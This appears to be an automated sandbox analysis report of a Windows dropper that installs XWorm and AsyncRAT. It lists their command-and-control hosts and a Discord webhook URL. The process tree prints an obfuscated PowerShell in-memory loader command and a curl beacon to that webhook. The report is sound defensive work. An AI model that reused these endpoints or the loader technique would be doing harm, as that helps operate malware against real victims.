Analysis

max time kernel: 150s
max time network: 0s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 22-06-2024 05:30

Static task: static1
Behavioral task: behavioral1
Sample: Dropper.exe
Resource: win7-20240220-en
General

Target: Dropper.exe
Size: 1.4MB
MD5: 0db5ce13fa3f2058572801bbffcaa3f3
SHA1: 49580b807ee8e9a7bd4b7a045ceec6c93ae093dd
SHA256: 9639537e3aa2c1d7866a72856656b9afa4e6c761d7c6ae43a78e1075b38f3b8b
SHA512: a46cbf5da20f09e514590e7de8f8e932427b15060724cd716c38e9e6b232003bcdf01db6dcf06300459c0386a7f3bbc2c6c354b578792e8b2ec13de4d1414f4b
SSDEEP: 12288:B0w1hc0Q53LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:BrmwDRPjwuB
Malware Config

Extracted: xworm
  politics-fiber.gl.at.ply.gg:47430
  Install_directory: %AppData%
  install_file: $77-scchost.exe

Extracted: asyncrat
  Default
  environmental-blank.gl.at.ply.gg:25944
  delay: 1
  install: true
  install_file: $77-aachost.exe
  install_folder: %AppData%
Signatures

Detect Xworm Payload (2 IoCs)
  resource | yara_rule
  \Users\Admin\AppData\Local\Temp\$77-sdchost.exe | family_xworm
  behavioral1/memory/2540-11-0x0000000001140000-0x0000000001152000-memory.dmp | family_xworm

Modifies security service (2 TTPs, 2 IoCs)
  Processes: svchost.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | svchost.exe
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes: powershell.EXE
  description | pid | process | target process
  PID 544 created 436 | 544 | powershell.EXE | winlogon.exe

Async RAT payload (1 IoC)
  resource | yara_rule
  \Users\Admin\AppData\Local\Temp\$77-aachost.exe | family_asyncrat

Executes dropped EXE (4 IoCs)
  Processes: $77-sdchost.exe, $77-aachost.exe, $77-penisballs.exe, $77-install.exe
  pid | process
  2540 | $77-sdchost.exe
  2456 | $77-aachost.exe
  2636 | $77-penisballs.exe
  2396 | $77-install.exe

Loads dropped DLL (4 IoCs)
  Processes: Dropper.exe
  pid | process
  2916 | Dropper.exe (4 rows)

Drops file in System32 directory (1 IoC)
  Processes: powershell.EXE
  description | ioc | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE

Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.EXE
  description | pid | process | target process
  PID 544 set thread context of 2588 | 544 | powershell.EXE | dllhost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS (2 IoCs)
  Processes: powershell.EXE
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 508eb94365c4da01 | powershell.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: powershell.EXE, dllhost.exe
  pid | process | rows
  544 | powershell.EXE | 2
  2588 | dllhost.exe | 62

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: $77-sdchost.exe, $77-penisballs.exe, powershell.EXE, dllhost.exe
  description | pid | process
  Token: SeDebugPrivilege | 2540 | $77-sdchost.exe
  Token: SeDebugPrivilege | 2636 | $77-penisballs.exe
  Token: SeDebugPrivilege | 544 | powershell.EXE
  Token: SeDebugPrivilege | 544 | powershell.EXE
  Token: SeDebugPrivilege | 2588 | dllhost.exe

Suspicious use of WriteProcessMemory (62 IoCs)
  Processes: Dropper.exe, taskeng.exe, powershell.EXE, dllhost.exe
  description | pid | process | target process | rows
  PID 2916 wrote to memory of 2872 | 2916 | Dropper.exe | cmd.exe | 4
  PID 2916 wrote to memory of 2540 | 2916 | Dropper.exe | $77-sdchost.exe | 4
  PID 2916 wrote to memory of 2456 | 2916 | Dropper.exe | $77-aachost.exe | 4
  PID 2916 wrote to memory of 2636 | 2916 | Dropper.exe | $77-penisballs.exe | 4
  PID 2916 wrote to memory of 2396 | 2916 | Dropper.exe | $77-install.exe | 7
  PID 2400 wrote to memory of 544 | 2400 | taskeng.exe | powershell.EXE | 3
  PID 544 wrote to memory of 2588 | 544 | powershell.EXE | dllhost.exe | 9
  PID 2588 wrote to memory of 436 | 2588 | dllhost.exe | winlogon.exe | 1
  PID 2588 wrote to memory of 484 | 2588 | dllhost.exe | services.exe | 1
  PID 2588 wrote to memory of 492 | 2588 | dllhost.exe | lsass.exe | 1
  PID 2588 wrote to memory of 500 | 2588 | dllhost.exe | lsm.exe | 1
  PID 2588 wrote to memory of 592 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 672 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 756 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 804 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 840 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 972 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 284 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 1052 | 2588 | dllhost.exe | spoolsv.exe | 1
  PID 2588 wrote to memory of 1072 | 2588 | dllhost.exe | taskhost.exe | 1
  PID 2588 wrote to memory of 1128 | 2588 | dllhost.exe | Dwm.exe | 1
  PID 2588 wrote to memory of 1152 | 2588 | dllhost.exe | Explorer.EXE | 1
  PID 2588 wrote to memory of 1176 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 1712 | 2588 | dllhost.exe | DllHost.exe | 1
  PID 2588 wrote to memory of 1736 | 2588 | dllhost.exe | svchost.exe | 1
  PID 2588 wrote to memory of 2940 | 2588 | dllhost.exe | sppsvc.exe | 1
  PID 2588 wrote to memory of 2916 | 2588 | dllhost.exe | Dropper.exe | 1
  PID 2588 wrote to memory of 2280 | 2588 | dllhost.exe | conhost.exe | 1
  PID 2588 wrote to memory of 2540 | 2588 | dllhost.exe | $77-sdchost.exe | 1
  PID 2588 wrote to memory of 2456 | 2588 | dllhost.exe | $77-aachost.exe | 1
  PID 2588 wrote to memory of 2636 | 2588 | dllhost.exe | $77-penisballs.exe | 1
  PID 2588 wrote to memory of 2400 | 2588 | dllhost.exe | taskeng.exe | 1
  PID 2588 wrote to memory of 544 | 2588 | dllhost.exe | powershell.EXE | 1
  PID 2588 wrote to memory of 1772 | 2588 | dllhost.exe | conhost.exe | 1
Processes

C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
    C:\Windows\System32\dllhost.exe
      command line: C:\Windows\System32\dllhost.exe /Processid:{a21b25eb-539e-49b8-9dd2-a1d4c5f53eac}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

C:\Windows\system32\services.exe
  command line: C:\Windows\system32\services.exe
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k DcomLaunch
        C:\Windows\system32\DllHost.exe
          command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k RPCSS
    C:\Windows\System32\svchost.exe
      command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
      - Modifies security service
    C:\Windows\System32\svchost.exe
      command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
        C:\Windows\system32\Dwm.exe
          command line: "C:\Windows\system32\Dwm.exe"
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k netsvcs
        C:\Windows\system32\taskeng.exe
          command line: taskeng.exe {ECC5C892-7EC0-4EB1-BB4B-9774F5A5B99C} S-1-5-18:NT AUTHORITY\System:Service:
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
              - Suspicious use of NtCreateUserProcessOtherParentProcess
              - Drops file in System32 directory
              - Suspicious use of SetThreadContext
              - Modifies data under HKEY_USERS
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k LocalService
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k NetworkService
    C:\Windows\System32\spoolsv.exe
      command line: C:\Windows\System32\spoolsv.exe
    C:\Windows\system32\taskhost.exe
      command line: "taskhost.exe"
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
    C:\Windows\system32\svchost.exe
      command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
    C:\Windows\system32\sppsvc.exe
      command line: C:\Windows\system32\sppsvc.exe

C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe
  command line: C:\Windows\system32\lsm.exe

C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
    C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\$77-install.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
          - Executes dropped EXE

C:\Windows\system32\conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe "-2886199161402797966904758125-964041378-111430048614937478262578368031342322812"

C:\Windows\system32\conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe "-13600568041519704366-7808701191735270432160028257112206212381203431390-1111462397"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize: 66KB
  MD5: f10712f4faa374be8f37668c5ebed4a6
  SHA1: bb30e941c4f91ae3178539e993abecbfd838fdb0
  SHA256: d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
  SHA512: cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac

\Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize: 256KB
  MD5: 18f497deffe88b6b2cff336a277aface
  SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize: 50KB
  MD5: 77a71f3a441aa3bf824967e52413bec5
  SHA1: c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
  SHA256: 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
  SHA512: 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

Memory dumps (path, Filesize):
  memory/436-62-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmp  64KB
  memory/436-63-0x0000000037270000-0x0000000037280000-memory.dmp  64KB
  memory/436-53-0x0000000000B90000-0x0000000000BB5000-memory.dmp  148KB
  memory/436-55-0x0000000000C50000-0x0000000000C7B000-memory.dmp  172KB
  memory/436-51-0x0000000000B90000-0x0000000000BB5000-memory.dmp  148KB
  memory/436-61-0x0000000000C50000-0x0000000000C7B000-memory.dmp  172KB
  memory/436-54-0x0000000000C50000-0x0000000000C7B000-memory.dmp  172KB
  memory/484-69-0x0000000000190000-0x00000000001BB000-memory.dmp  172KB
  memory/484-75-0x0000000000190000-0x00000000001BB000-memory.dmp  172KB
  memory/484-76-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmp  64KB
  memory/484-77-0x0000000037270000-0x0000000037280000-memory.dmp  64KB
  memory/492-91-0x0000000037270000-0x0000000037280000-memory.dmp  64KB
  memory/492-83-0x00000000000C0000-0x00000000000EB000-memory.dmp  172KB
  memory/492-89-0x00000000000C0000-0x00000000000EB000-memory.dmp  172KB
  memory/492-90-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmp  64KB
  memory/500-97-0x00000000002F0000-0x000000000031B000-memory.dmp  172KB
  memory/544-35-0x000000001A090000-0x000000001A372000-memory.dmp  2.9MB
  memory/544-38-0x0000000077230000-0x00000000773D9000-memory.dmp  1.7MB
  memory/544-36-0x0000000000A50000-0x0000000000A58000-memory.dmp  32KB
  memory/544-37-0x0000000001400000-0x000000000142A000-memory.dmp  168KB
  memory/544-39-0x0000000077110000-0x000000007722F000-memory.dmp  1.1MB
  memory/2456-19-0x0000000000E00000-0x0000000000E16000-memory.dmp  88KB
  memory/2540-11-0x0000000001140000-0x0000000001152000-memory.dmp  72KB
  memory/2588-41-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-40-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-47-0x0000000077110000-0x000000007722F000-memory.dmp  1.1MB
  memory/2588-42-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-43-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-45-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-48-0x0000000140000000-0x0000000140008000-memory.dmp  32KB
  memory/2588-46-0x0000000077230000-0x00000000773D9000-memory.dmp  1.7MB
  memory/2636-33-0x00000000001D0000-0x00000000001D6000-memory.dmp  24KB
  memory/2636-27-0x00000000001F0000-0x0000000000236000-memory.dmp  280KB
  memory/2916-0-0x000000007443E000-0x000000007443F000-memory.dmp  4KB
  memory/2916-1-0x00000000001A0000-0x0000000000310000-memory.dmp  1.4MB
  memory/2916-223-0x000000007443E000-0x000000007443F000-memory.dmp  4KB